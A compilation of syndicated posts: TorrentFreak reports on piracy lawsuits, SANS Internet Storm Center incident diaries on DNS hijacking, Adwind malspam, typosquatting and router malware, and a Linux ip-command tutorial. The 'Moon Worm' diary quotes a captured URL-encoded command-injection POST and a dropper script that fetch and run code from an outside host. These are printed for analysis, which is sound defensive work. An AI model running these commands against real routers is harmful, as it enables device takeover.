    “Two years ago, Parliament adopted an amendment providing Rights Alliance and the people who own these intellectual property rights to take action, and to ask the court for compensation for abuse of their intellectual property. We are now considering making further legislative changes to protect intellectual property from being abused online,” Borgundvåg told NRK.

    In the meantime, however, groups like Rights Alliance, the MPA and their Hollywood affiliates have to deal with the law as it stands today. They have been granted permission to harvest IP address information by the country’s Data Inspectorate but obtaining the identities behind those addresses will require further work.

    “In relation to the legislation we have in Norway, Rights Alliance is fully entitled to collect IP addresses of Popcorn Time users. This is not problematic as we see it,” explains Inspectorate Director Bjorn Erik Thon.

    “Rights Alliance may collect IP addresses, but to find out the identities of who is behind them requires a trial,” he notes.

    However, according to law professor Olav Torvund, even getting that far is likely to provide headaches.

    “This is not straightforward,” Torvund explains.

    “Rights Alliance must determine which IP addresses have been used. Most Norwegian users have [regularly changing] dynamic IP addresses which do not necessarily identify the user.”

    And even if users are successfully identified, legal problems persist.

    “One must have acted intentionally or negligently and known or understood that material is being shared with others [when using Popcorn Time],” Torvund says.

    “It is not necessarily so easy to prove. In other words, it’s a long way to the finish and there are several problems to overcome.”

    While Rights Alliance are known to go after both site owners and users elsewhere in Scandinavia (there were arrests in Denmark last week), it seems unlikely that they will take a troll-like stance with Popcorn Time users in the way that the makers of Dallas Buyers Club have.

    Still, the fall isn’t too far away, so time will soon tell.

    Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

    TorrentFreak: Dallas Buyers Club Wants to Interrogate Suspected Pirates

    This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

    dallasThe makers of Dallas Buyers Club have sued hundreds of BitTorrent users over the past year.

    Many of these cases end up being settled for an undisclosed amount. This usually happens after the filmmakers obtain the identity of the Internet account holder believed to have pirated the movie.

    Not all alleged downloaders are eager to pay up though. In fact, many don’t respond to the settlement letters they receive or claim that someone else must have downloaded the film using their connection.

    In a recent court filing (pdf) at a Washington District Court the filmmakers explain the efforts they undertake to ensure that the right person is accused. This includes gathering information from Facebook, LinkedIn and even Google Maps.

    “Google address mapping and county records were investigated to confirm ownership/rental status of and residence at the property associated with the IP address, as well as observe the physical makeup and layout of the house and neighborhood to anticipate possible claims that a wireless signal was highjacked by someone outside of the residence,” the filmmakers explain.

    The router security settings and download history of a specific connection are used as additional pieces of information to ensure that the alleged copyright infringements are systematic.

    “Further, given the standard security measures imposed by ISPs to prevent unauthorized use of an IP address, the volume of piracy demonstrated over the extended observation period could not be the result of someone driving by, a temporary house guest or a hacker sitting in a car on the street.”

    While the methods above are already quite invasive, Dallas Buyers Club now aims to take it up a notch.

    In order to pinpoint the true pirates the movie studio wants to depose 15 account holders. This means that they will have to testify under oath for up to two hours and face a grilling from the studio’s legal team.

    This is the first time that we’ve seen a request for a deposition in a Dallas Buyers Club case. Needless to say, a testimony under oath can be quite intimidating, and is highly unusual in these types of cases.

    The account holders of IP-addresses linked to the pirated downloads have already been identified by the ISP. However, they failed to respond to the movie studio or denied that they had shared the film illegally.

    Through a testimony under oath, the movie studio hopes to identify the true pirates, so they can be named in the lawsuit.

    “DBC believes that further discovery is warranted to confirm which of any possible occupants of the physical address assigned the infringing IP address is the proper Doe defendant to be named in the case,” they note.

    The filmmakers suspect that some of the subscribers are the actual infringers, but it’s possible that they’re covering for someone else, such as a roommate or spouse.

    “A subscriber should not be allowed to shield, immunize and anonymize those they allow to use their Internet service from liability for intentional torts. The subscriber is the single best and perhaps only source of information as to the responsible party using its IP address.”

    According to the filmmakers the depositions will result in a reduction of legal expenses while guaranteeing the anonymity of the defendants.

    However, more critical observers may also note that it is an optimal tool to pressure ISP subscribers who choose to ignore settlement requests and other threats.

    At the time of writing the court has yet to rule on the discovery request.

    Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

    TorrentFreak: Movie Studio Sues Popcorn Time Users In The U.S.

    This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

    cobblerOver the past several years hundreds of thousands of Internet subscribers have been sued in the United States for allegedly sharing copyrighted material, mostly video.

    The cases are generally targeted at “BitTorrent” users in general, not focusing on any client in particular.

    However, this week the makers of the 2014 comedy “The Cobbler” decided to single out Popcorn Time users.

    Popcorn Time also uses BitTorrent under the hood but unlike traditional clients it allows users to browse through a library of films and stream these from within the application.

    Popcorn Time is by no means private as users connect to public BitTorrent swarms, which makes it easy for monitoring firms and copyright holders to track down pirates.

    This also happened to 11 Popcorn Time users who allegedly viewed and shared “The Cobbler.” The makers of the movie filed a complaint (pdf) at an Oregon District Court requesting a subpoena to compel Comcast to hand over the personal details of the associated account holders.

    “Each defendant’s IP address has been observed and confirmed as both viewing and distributing plaintiff’s motion picture through Popcorn Time,” the complaint explains.

    The Popcorn Time defendants

    The reason for singling out Popcorn Time users is unclear. The same filmmakers have launched lawsuits against BitTorrent users before, but they may believe that the infringing image of Popcorn Time bolsters their case.

    “Popcorn Time exists for one purpose and one purpose only: to steal copyrighted content,” they write, adding that the defendants should have been well aware of this.

    The Popcorn Time website and application repeatedly informs users that its use may be against the law. For example, the Popcorn Time website has a clear warning on its homepage and in the FAQ.

    “Without a doubt, each user of Popcorn Time is provided multiple notices that they are downloading and installing software for the express purpose of committing theft and contributing the ability of others to commit theft by furthering the Bit Torrent piracy network,” the complaint explains.

    Popcorn Time warning

    The filmmakers demand a permanent injunction against the defendants ordering them to stop pirating their movies. In addition, they request statutory damages of up to $150,000.

    In reality, however, they are likely to approach the defendants for a settlement offer of a few thousand dollars, as is common in these types of “copyright troll” cases.

    The developers of the Popcorn Time app that was targeted inform TF that users are indeed repeatedly warned that using their application to download pirated films can lead to legal trouble.

    “Popcorn Time isn’t illegal. However, the use people make of the application can be illegal, depending on their country and local laws,” they tell TF.

    “You’d think with all our warnings, the anti-piracy laws, the explanations given in the media and the common sense, users would be aware of their actions by now. Pinning a ‘Popcorn Time’ label over such a lawsuit seems a little inflated,” they add.

    The Court has yet to issue an order following the subpoena request. Based on previous cases the account holders connected to the 11 IP-addresses listed above can expect a settlement offer in the mail soon.

    Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

    SANS Internet Storm Center, InfoCON: green: Outsourcing critical infrastructure (such as DNS), (Wed, Aug 19th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    Migrating everything to the cloud or to various online services has become increasingly popular in the last couple of years (and will probably not stop). However, leaving our most valuable jewels with someone else makes a lot of security people (me included) nervous.

    During some of the latest external penetration tests I noticed an increasing trend of companies moving some of their services to various cloud solutions or to their ISPs. A DNS lookup for one such target company's domain returned records along these lines (sanitized):

    ;; ANSWER SECTION:
    1365 IN NS
    1365 IN NS

    ;; ADDITIONAL SECTION:
    1366 IN A
    9018 IN A

    Now what do we have here? Things look generally OK: there are two DNS servers for our target domain, at two different hosting companies (or, for the sake of this article, we can pretend that they are at the target company's ISP).

    The problem here is that the trust for our most critical infrastructure now lies completely with the ISP (or a hosting company). Why is that a problem? Well, remember all those attacks that happen when an account at a registrar gets hacked and domain information (including DNS servers) gets changed? The same thing applies here: DNS servers are the key to our kingdom.

    I recently had to work on an incident that included such an attack, where the NS records were modified silently by an attacker that got access to the hosting company. And that attack was very sneaky: the attacker modified only selected DNS records, namely the MX records. So, for a couple of hours during a business day, the attacker changed the MX records (only) to point to his SMTP servers. Those servers were configured just to relay e-mail (and additionally, a specific version of an SMTP server was used to prevent adding headers) to the real destination. This was a very simple man-in-the-middle attack that was, unfortunately, very successful for the attacker, as he was able to collect and analyze absolutely all e-mail sent to the victim company. While he was not able to see the outgoing e-mails, just remember how many times you've seen people actually remove the original e-mail (or reply inline) when replying? This is indeed very rare these days, although older readers will remember that once upon a time it was part of netiquette.

    Lessons learned here? While outsourcing DNS servers is not necessarily a bad thing, be aware of the risks that come with it (and with cloud usage in general). For this particular case, depending on the business the target company is in, I usually recommend that the DNS servers, as critical infrastructure, be kept on premises and managed by local staff. This way, you decrease the risk of the hosting company getting pwned, or simply the risk of a disgruntled employee at the hosting company.

    If you do decide to outsource DNS anyway, first ask yourself whether you would detect the attack I mentioned. What controls do you have in place for detecting such an attack?
    Implementation of additional monitoring controls such as regularly checking your critical DNS records (such as NS, MX and possibly A records for critical names) can go a long way and is very inexpensive. For this particular case, SPF would help as well, but unfortunately the majority of servers will simply use SPF information for spam detection and only very rare MUAs will warn users when SPF records do not match the sending IP address.
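
    One inexpensive way to implement the record checks mentioned above is a small script run from cron that compares the current NS and MX records against a saved baseline. The sketch below assumes a hypothetical domain (example.com), a public resolver, and local paths of your choosing.

    #!/bin/sh
    # Minimal sketch: alert (here, just print) when the published NS or MX records differ from a stored baseline.
    DOMAIN=example.com
    BASELINE=/var/lib/dns-baseline
    mkdir -p "$BASELINE"
    for TYPE in NS MX; do
        dig +short "$TYPE" "$DOMAIN" @8.8.8.8 | sort > "/tmp/$DOMAIN.$TYPE"
        if [ -f "$BASELINE/$DOMAIN.$TYPE" ]; then
            diff -u "$BASELINE/$DOMAIN.$TYPE" "/tmp/$DOMAIN.$TYPE" || echo "ALERT: $TYPE records for $DOMAIN changed"
        else
            cp "/tmp/$DOMAIN.$TYPE" "$BASELINE/$DOMAIN.$TYPE"
        fi
    done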

    Have similar outsourcing war stories? Let us know!


    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    Ruoho: Multiple Vulnerabilities in Pocket

    This post was syndicated from: and was written by: jake. Original post: at

    On his blog, Clint Ruoho reports on multiple vulnerabilities he found in the Pocket service that saves articles and other web content for reading later on a variety of devices. Pocket integration has been controversially added to Firefox recently, which is what drew his attention to the service. “The full output from server-status then was synced to my Android, and was visible when I switched from web to article view. Apache’s mod_status can provide a great deal of useful information, such as internal source and destination IP address, parameters of URLs currently being requested, and query parameters. For Pocket’s app, the URLs being requested include URLs being viewed by users of the Pocket application, as some of these requests are done as HTTP GETs.

    These details can be omitted by disabling ExtendedStatus in Apache. Most of Pocket’s backend servers had ExtendedStatus disabled, however it remained enabled on a small subset, which would provide meaningful information to attackers.” He was able to get more information, such as the contents of /etc/passwd on Pocket’s Amazon EC2 servers.
    (Thanks to Scott Bronson and Pete Flugstad.)
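
    For administrators running their own Apache servers, the exposure described in the quote can be reduced with a couple of configuration directives. The snippet below is a generic sketch, not a detail from the report; the 192.0.2.10 monitoring host and the Apache 2.4 "Require" syntax are assumptions.

    # httpd.conf / vhost fragment: no extended status, and /server-status reachable only from one internal host.
    ExtendedStatus Off
    <Location "/server-status">
        SetHandler server-status
        Require ip 192.0.2.10
    </Location>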

    Linux How-Tos and Linux Tutorials: Replacing ifconfig with ip

    This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

    If you’ve been around Linux long enough, you know tools come and go. This was assumed to be the case back around 2009 when the debian-devel mailing list announced plans on deprecating the net-tools package due to lack of maintenance. It is now 2015 and net-tools is still around. In fact, as of Ubuntu 14.10, you can still issue the ifconfig command to manage your network configuration.

    However, in some instances (e.g., Ubuntu Docker container), the net-tools suite isn’t installed by default. This means the ifconfig command isn’t available. Although you can install net-tools with the command

    sudo apt-get install net-tools

    it is most often recommended to move forward with the command that has replaced ifconfig. That command is ip, and it does a great job of stepping in for the out-of-date ifconfig.

    Thing is, ip is not a drop-in replacement for ifconfig. There are differences in the structure of the commands. Even with these differences, both commands are used for similar purposes. In fact, ip can do the following:

    • Discover which interfaces are configured on a system

    • Query the status of a network interface

    • Configure the network interfaces (including local loop-back, and Ethernet)

    • Bring an interface up or down

    • Manage both default and static routing

    • Configure tunnel over IP

    • Configure ARP or NDISC cache entry

    With all of that said, let’s embark on replacing ifconfig with ip. I’ll offer a few examples of how the replacement command is used. Understand that this command does require admin privileges (so you’ll either have to su to root or make use of sudo — depending upon your distribution). Because these commands can make changes to your machine’s networking information, use them with caution.

    NOTE: All addresses used in this how-to are examples. The addresses you will use will be dictated by your network and your hardware.

    Now, on with the how-to.

    Gathering Information

    The first thing most people learn with the ifconfig command is how to find out what IP address has been assigned to an interface. This is usually done with the command ifconfig and no flags or arguments. To do the same with the ip command, it is run as such:

    ip a

    This command will list all interfaces with their associated information (Figure 1 above).

    Let’s say you only want to see IPv4 information (for clarity). To do this, issue the command:

    ip -4 a

    Or, if you only want to see IPv6 information:

    ip -6 a

    What if you only want to see information regarding a specific interface? You can list information for a wireless connection with the command:

    ip a show wlan0

    You can even get more specific with this command. If you only want to view IPv4 on the wlan0 interface, issue the command:

    ip -4 a show wlan0

    You can even list only the running interface using:

    ip link ls up

    Modifying an Interface

    Now we get into the heart of the command… using it to modify an interface. Suppose you wanted to assign a specific address to the first ethernet interface, eth0. With the ifconfig command, that would look like:

    ifconfig eth0 192.168.1.10 netmask 255.255.255.0

    With the ip command, this now looks like:

    ip a add 192.168.1.10/255.255.255.0 dev eth0

    You could shorten this a bit with:

    ip a add 192.168.1.10/24 dev eth0

    Clearly, you will need to know the subnet mask of the address you are assigning.

    What about deleting an address from an interface? With the ip command, you can do that as well. For example, to delete the address just assigned to eth0, issue the following command:

    ip a del 192.168.1.10/24 dev eth0

    What if you want to simply flush all addresses within a given network from your interfaces? The ip command has you covered with this command:

    ip -s -s a f to 192.168.1.0/24

    Another crucial aspect of the ip command is the ability to bring up/down an interface. To bring eth0 down, issue:

    ip link set dev eth0 down

    To bring eth0 back up, use:

    ip link set dev eth0 up

    With the ip command, you can also add and delete default gateways. This is handled like so:

    ip route add default via 192.168.1.1
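
    Putting those pieces together, a typical static bring-up of an interface might look like the following; as with the rest of this how-to, the address, prefix, and gateway are only examples.

    ip a add 192.168.1.10/24 dev eth0       # assign the example address
    ip link set dev eth0 up                 # bring the interface up
    ip route add default via 192.168.1.1    # point default traffic at the example gateway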

    If you want to get really detailed on your interfaces, you can edit the transmit queue. You can set the transmit queue to a low value for slower interfaces and a higher value for faster interfaces. To do this, the command would look like:

    ip link set txqueuelen 10000 dev eth0

    The above command would set a high transmit queue. You can play around with this value to find what works best for your hardware.

    You can also set the Maximum Transmission Unit (MTU) of your network interface with the command:

    ip link set mtu 9000 dev eth0

    Once you’ve made the changes, use ip a list eth0 to verify the changes have gone into effect.

    Managing the Routing Table

    With the ip command you can also manage the system’s routing tables. This is a very powerful element of the ip command, and you should use it with caution.

    Suppose you want to view all routing tables. To do this, you would issue the command:

    ip r

    The output of this command will look like that shown in Figure 2.


    Now, say you want to route all traffic via the 192.168.1.1 gateway connected to the eth0 network interface. To do that, issue the command:

    ip route add default via 192.168.1.1 dev eth0

    To delete that same route, issue:

    ip route del default via 192.168.1.1 dev eth0

    This article should serve as merely an introduction to the ip command. This, of course, doesn’t mean you must immediately jump from ifconfig. Because the deprecation of ifconfig has been so slow, the command still exists on many a distribution. But, on the occasion of ifconfig finally vanishing from sight, you’ll be ready to make the transition with ease. For more detailed information on the ip command, take a look at the ip man page by issuing the command man ip from a terminal window.

    SANS Internet Storm Center, InfoCON: green: Adwind: another payload for botnet-based malspam, (Fri, Aug 14th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green


    Since mid-July 2015, I've noticed an increase in malicious spam (malspam) caught by my employer's spam filters with Java archive (.jar file) attachments. These .jar files are most often identified as Adwind. Adwind is a Java-based remote access tool (RAT) used by malware authors to infect computers with backdoor access. There's no vulnerability involved. To infect a Windows computer, the user has to execute the malware by double-clicking on the .jar file. Of course, you have to have the Java Runtime Environment installed, which many people do.

    I previously associated Adwind with targeted phishing attempts in limited amounts. I had found very few examples of non-targeted malspam using this RAT.

    However, we're currently seeing enough Adwind-based malspam to ask: Is Adwind now another payload for botnet-based malspam?


    Adwind originated from the Frutas RAT [1]. Frutas was a Java-based RAT discovered by Symantec from underground forums in early 2013 [2]. By the summer of 2013, the name had changed to Adwind, and signatures for Adwind-based malware were implemented by anti-virus companies [3]. In November of 2013, Adwind was rebranded and sold under a new name: UNRECOM (UNiversal REmote COntrol Multi-platform) [1].

    Throughout 2013, we noticed a few occasions of Adwind used in phishing attempts. 2014 saw an increase of Adwind/UNRECOM malware used in phishing campaigns targeting U.S. state and local government, technology, advisory services, health, and financial sectors [4].

    By April 2015, a new Adwind/UNRECOM variant called AlienSpy was widely reported, and this new variant included Transport Layer Security (TLS) encryption for command-and-control communications. These TLS communications involve certificates. EmergingThreats posted a signature for Adwind-based certificates in March of 2015 [5], and Fidelis CyberSecurity Solutions published an in-depth report on AlienSpy the following month [6].

    The naming progression appears to be: Frutas – Adwind – UNRECOM – AlienSpy. From what I can tell, it's all been Java-based malware sent as .jar file attachments in phishing emails. Many people still refer to it as Adwind, which is how I see it identified most often.

    Not counting targeted attempts, I've found Adwind-based malspam maybe once every month or two. That changed in mid-July 2015. After that, the amount of malspam with Adwind increased dramatically. Currently, I see at least one Adwind-based malspam every day on average. The frequency of this malspam, along with the variety of subject lines, attachment names, and senders, indicates Adwind is no longer limited to targeted attacks. Frutas/Adwind/UNRECOM/AlienSpy (whatever you want to call it) appears to be another payload for botnet-based malspam.

    The emails

    Here's a sample of the different senders, subjects, and attachment names I've seen. I'd run across this malware maybe once every month or two, and I never paid much attention to it until I noticed the recent increase. I collected some samples during the past week and examined them. With the appropriate software packages installed, I could use the command jar tf [filename] to list the contents of the Java archive.

    Shown above: Listing some of the Adwind .jar files' contents
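
    As a concrete (and purely illustrative) example of that inspection step, listing the contents of one of the attachments without ever executing it could look like this; the file name is taken from the samples listed below.

    jar tf Invoice-Processed.jar      # list the archive contents (requires a JDK for the jar tool)
    unzip -l Invoice-Processed.jar    # same idea with unzip, since a .jar is just a zip archive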

    Command and control communications

    Samples collected during the past week show the following TLS-encrypted SSL traffic after the infection:

    Read: host name – IP address – port

    • – – TCP port 588
    • – – TCP Port 8001
    • – – TCP port 10000
    • – – TCP port 9887
    • – TCP port 1818

    I examined a pcap from the last malware sample above, with command-and-control traffic on TCP port 1818. You can find the certificate associated with Adwind in Wireshark. First, follow a TCP stream with the traffic on port 1818. From the Wireshark menu, select Analyze -> Decode As... and decode the port 1818 traffic as SSL.

    Wireshark will now parse this TCP stream as SSL.

    This still shows the same certificate information used since EmergingThreats tagged it in their Snort signature from March 2015 [5]. I saw the same certificate information used last week [7], and it continues this week.

    • commonName = assylias
    • organizationName = assylias.Inc
    • countryName = FR
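
    If you suspect a host is talking to one of these C2 servers, one way to check for that certificate is to pull it directly with openssl; the address and port below are placeholders for a server taken from the list above.

    # Grab the certificate presented by the suspected C2 server and print its subject and issuer.
    echo | openssl s_client -connect 198.51.100.20:1818 2>/dev/null | openssl x509 -noout -subject -issuer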

    Currently, this may be the best way to identify Adwind-based post-infection traffic.

    Malware samples

    Below, I've included information on examples of Adwind malware found during the past week:

    File name: Invoice-Processed.jar

    • File size 96.5 KB ( 98,866 bytes )
    • MD5 hash: d93dd17a9adf84ca2839708d603d3bd6
    • SHA1 hash: ddca2db7b7ac42d8a4a23c2e8ed85de5e91dbf29
    • SHA256 hash: d5d3d46881d8061bb3679aee67715f38bebefb6251eb3fdfa4a58596db8f5b16
    • Detection ratio: 8 / 50
    • First submission: 2015-08-09 08:27:37 UTC
    • VirusTotal link – Malwr link – Hybrid-Analysis link
    • Command and control: – – TCP port 588

    File name: Products List.jar

    • File size: 99.0 KB ( 101,349 bytes )
    • MD5 hash: 201fd695feba07408569f608cd639465
    • SHA1 hash: b11857de46ba3365af5f46171bbe126f19483fee
    • SHA256 hash: 0e198e6e1b9cfa5be0d9829e10717093487548b5c0d6fbbeaae6be1d53691098
    • Detection ratio: 8 / 56
    • First submission: 2015-08-10 19:42:56 UTC
    • VirusTotal link – Malwr link – Hybrid-Analysis link

    File name: Purchase Order (PO).jar

    • File size: 99.0 KB ( 101,344 bytes )
    • MD5 hash: 78990750a764dce7a7a539fb797298a1
    • SHA1 hash: af35dc7c1e4a32d53fe41e2debc73a82cc1f52bd
    • SHA256 hash: 9eeeb3b6be01ad321c5036e6c2c8c78244b016bf7900b6fd3251139149dae059
    • Detection ratio: 8 / 56
    • First submission: 2015-08-10 19:43:20 UTC
    • VirusTotal link – Malwr link – Hybrid-Analysis link

    File name: Invoice.jar

    • File size: 96.6 KB ( 98,903 bytes )
    • MD5 hash: da9f9b69950a64527329887f8168f0b4
    • SHA1 hash: 752fab5861093e7171463b0b945e534e1ff66253
    • SHA256 hash: 70290f0ffffcb4f8d90bce59f16105fd5ff61866e3dda5545b122b3c4098051b
    • Detection ratio: 10 / 56
    • First submission: 2015-08-10 06:40:09 UTC
    • VirusTotal link – Malwr link – Hybrid-Analysis link
    • Command and control: – – TCP Port 8001


    • File size: 99.0 KB ( 101,342 bytes )
    • MD5 hash: 1fb2b0742e448124c000c34912765634
    • SHA1 hash: 29d5d03dab95cd5d38bd691d5559202816d36417
    • SHA256 hash: ff2b35d58d2e1ade904187eeffba709c84a9a998c6323b22fc5b7cac74cd1293
    • Detection ratio: 25 / 56
    • First submission: 2015-08-10 10:12:16 UTC
    • VirusTotal link – Malwr link – Hybrid-Analysis link
    • Command and control: – – TCP port 10000

    File name: Request Quotation Item.jar

    • File size: 99.0 KB ( 101,370 bytes )
    • MD5 hash: e08b81fd1b1b409096e65011e96ac62b
    • SHA1 hash: 0fa5ce77ba5df13c596824681402c3ece7b5c1e8
    • SHA256 hash: 771bb9fe6db1453e3de20ba7c39b8502c1249c6fcfd0022031ab767636136e7a
    • Detection ratio: 26 / 56
    • First submission: 2015-08-10 19:09:04 UTC
    • VirusTotal link – Malwr link – Hybrid-Analysis link
    • Command and control: – – TCP port 9887

    File name: Price Check.jar

    • File size: 99.0 KB ( 101,359 bytes )
    • MD5 hash: 5190bde4532248eb133f4dae044c492a
    • SHA1 hash: 54484c3a466fb8efb982520a714045d218c83dcf
    • SHA256 hash: d54e97bc1204f3674572d60e17db04c11bbe018ba9ab0250bd881cbcc5a9622e
    • Detection ratio: 25 / 56
    • First submission: 2015-08-11 15:57:22 UTC
    • VirusTotal link – Malwr link – Hybrid-Analysis link

    File name: Invoice.jar

    • File size: 93.2 KB ( 95,455 bytes )
    • MD5 hash: 0df04436cce61f791ec7da24ab34d71b
    • SHA1 hash: 75fa848e0048e040aed231f9db45b14bf1a903d7
    • SHA256 hash: f2188d223305092fe0a9c8be89c69e149c33c3ea4b1c0843fda00771ac72272d
    • Detection ratio: 10 / 55
    • First submission: 2015-08-12 19:53:46 UTC
    • VirusTotal link – Malwr link – Hybrid-Analysis link

    File name: CDX30404.jar

    • File size: 100.6 KB ( 102,970 bytes )
    • MD5 hash: 5ab9653be58e63bf8df7fb9bd74fa636
    • SHA1 hash: 3af9157dffde41f673cdacc295f2887b5c56e357
    • SHA256 hash: f8f99b405c932adb0f8eb147233bfef1cf3547988be4d27efd1d6b05a8817d46
    • Detection ratio: 22 / 49
    • First submission: 2015-08-09 20:57:26 UTC
    • VirusTotal link – Malwr link – Hybrid-Analysis link
    • Command and control: – TCP port 1818

    File name: PO#192603.jar

    • File size: 95.6 KB ( 97,918 bytes )
    • MD5 hash: c5cdbf91ebd4bab736504415806a96b7
    • SHA1 hash: ceb29d24f0dc96d867c9a99306d155a31c5eb807
    • SHA256 hash: 48a0859478fb2b659e527ed06abf44ef40d84c37a5117d49ca2312feed1b1b7d
    • Detection ratio: 13 / 56
    • First submission: 2015-08-13 17:21:33 UTC
    • VirusTotal link – Malwr link – Hybrid-Analysis link

    Final words

    I collected some emails from the past few days, sanitized them, and saved them to a zip archive. That archive is available at:

    The zip archive is password-protected with the standard password. If you don't know it, email and ask.

    This malspam might all be from the same botnet, but I haven't had time to dig through the malware samples to confirm. Furthermore, my view is limited to whatever I collect from the spam filters at my current employer. I suspect other organizations with access to more data have better insight.

    If any of you have encountered examples of this malspam, feel free to share in the comments.

    Brad Duncan
    Security Researcher at Rackspace
    Blog: – Twitter: @malware_traffic



    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    SANS Internet Storm Center, InfoCON: green: .COM.COM Used For Malicious Typo Squatting, (Mon, Aug 10th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    Today, our reader Jeff noted how domains ending in .com.com are being redirected to what looks like malicious content. Back in 2013, a blog by WhiteHat Security pointed out that the famous com.com domain name was sold by CNET to a known typo squatter [1]. Apparently, the buyer paid $1.5 million for this particular domain. Currently, the whois information uses privacy protection, and DNS for the domain is hosted by Amazon's cloud.

    All hostnames appear to resolve to 54.201.82.69, also hosted by Amazon (the bare com.com domain is also directed to the same IP, but right now it results in more of a parked page, not the fake anti-malware served on other hostnames).

    The content you receive varies. For example, on my first hit from my Mac, I received the following page:

    And of course the fake scan it runs claims that I have a virus :)

    As a solution, I was offered the well-known scam app MacKeeper.

    Probably best to block DNS lookups for any .com.com domains. The IP address is likely going to change soon, but I don't think there is any valid content at any of these host names.

    The WhiteHat article does speak to the danger of e-mail going to these systems. An MX record is configured, but the mail server didn't accept any connections from me (maybe it is overloaded?).

    Amazon EC2 abuse was notified.


    Johannes B. Ullrich, Ph.D.

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    SANS Internet Storm Center, InfoCON: green: Whatever Happened to tmUnblock.cgi ("Moon Worm"), (Tue, Aug 4th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    Last year, we wrote about the Moon Worm, a bitcoin mining piece of malware that infected Linksys routers. Ever since then, I have seen lots and lots of hits to the vulnerable cgi script (tmUnblock.cgi). For example:

    – – [04/Aug/2015:10:03:44 +0000] GET /tmUnblock.cgi HTTP/1.1 200 195 – –
    – – [04/Aug/2015:10:03:45 +0000] POST /tmUnblock.cgi HTTP/1.1 200 195 – –

    One of the POST requests looked like this:

    POST /tmUnblock.cgi HTTP/1.1
    Host: [server ip address]:8080
    Accept-Encoding: identity
    Content-Length: 850

    %73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e %3d%61%63%74%69%6f%6e%3d%63%6f%6d%6d%69%74%3d%74%74%63%70%5f%6e%75%6d%3d%32%74 %74%63%70%5f%73%69%7a%65%3d%32%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74 %6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%69%72%6b%31%2e %73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%69%72%6b%32%2e%73%68%20%68%74 %74%70%3a%2f%2f%31%30%39%2e%32%30%36%2e%31%37%37%2e%31%36%2f%66%65%72%72%79%2f%72 %65%76%31%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68%3b%65%63%68%6f%20%22%63 %68%6d%6f%64%20%2b%78%20%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68 %3b%65%63%68%6f%20%22%2e%2f%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73 %68%3b%63%68%6d%6f%64%20%2b%78%20%69%72%6b%31%2e%73%68%3b%2e%2f%69%72%6b%31%2e%73 %68%60″>submit_button=change_action=action=commit=ttcp_num=2ttcp_size=2echo #!/bin/sh echo wget -O hxxp:// echo chmod +x echo ./ ./`StartEPI=1
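
    A quick (bash-specific) way to decode a captured POST body like the one above is to turn the %XX sequences into \xXX escapes and let echo -e expand them; post-body.txt is a placeholder for a file holding the encoded payload.

    echo -e "$(sed 's/%/\\x/g' post-body.txt)"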

    Unlike for the Moon worm, the additional malware is not pulled from the host sending the exploit. The downloaded script looks like this:

    #!/bin/sh
    cd /tmp
    wget -O .nttpd hxxp://,14-le-t1
    chmod +x .nttpd
    sleep 2
    wget -O .sox,14-le-t1
    chmod +x .sox

    The script downloads and runs two additional executables. I haven't done the full analysis yet (let me know if you want a copy). A quick look shows firewall rules like the following being set up:

    INPUT -p udp --dport 9999 -j DROP
    INPUT -p tcp -m multiport --dport 80,8080 -j DROP
    INPUT -s -j ACCEPT
    INPUT -s -j ACCEPT
    INPUT -s -j ACCEPT
    INPUT -s -j ACCEPT
    INPUT -s -j ACCEPT

    So it looks like the attacker is securing the router by blocking access to the web-based admin interface (ports 80, 8080) and allowing access only from very specific IP addresses, probably controlled by the attacker.
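
    If you administer one of these routers and can get a shell on it, the rules described above should be visible in the INPUT chain; a simple check (assuming the firmware uses iptables) is:

    iptables -S INPUT                       # print the rules in the same shorthand shown above
    iptables -L INPUT -n -v --line-numbers  # or a more verbose listing with packet counters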

    VirusTotal identifies .nttpd and .sox as a proxy (Avast, DrWeb). Reports for these binaries go back a few months.

    The scripts also appear to modify the name servers in resolv.conf, but so far I think they only set them to Google's name servers (8.8.8.8 and 8.8.4.4).

    FWIW: per whois, the IP address hosting the scripts belongs to Serverel, a California company (but it is RIPE IP address space). Serverel was notified.

    Johannes B. Ullrich, Ph.D.

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    SANS Internet Storm Center, InfoCON: green: Your SSH Server On Port 8080 Is No Longer "Hidden" Or "Safe", (Mon, Aug 3rd)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

    I am seeing some scanning for SSH servers on port 8080 in web server logs for web servers that listen on this port. So far, I don't see any scans like this for web servers listening on port 80. In web server logs, the scan is reflected as an Invalid Method (error 501) as the web server only sees the banner provided by the SSH client, and of course cannot respond.

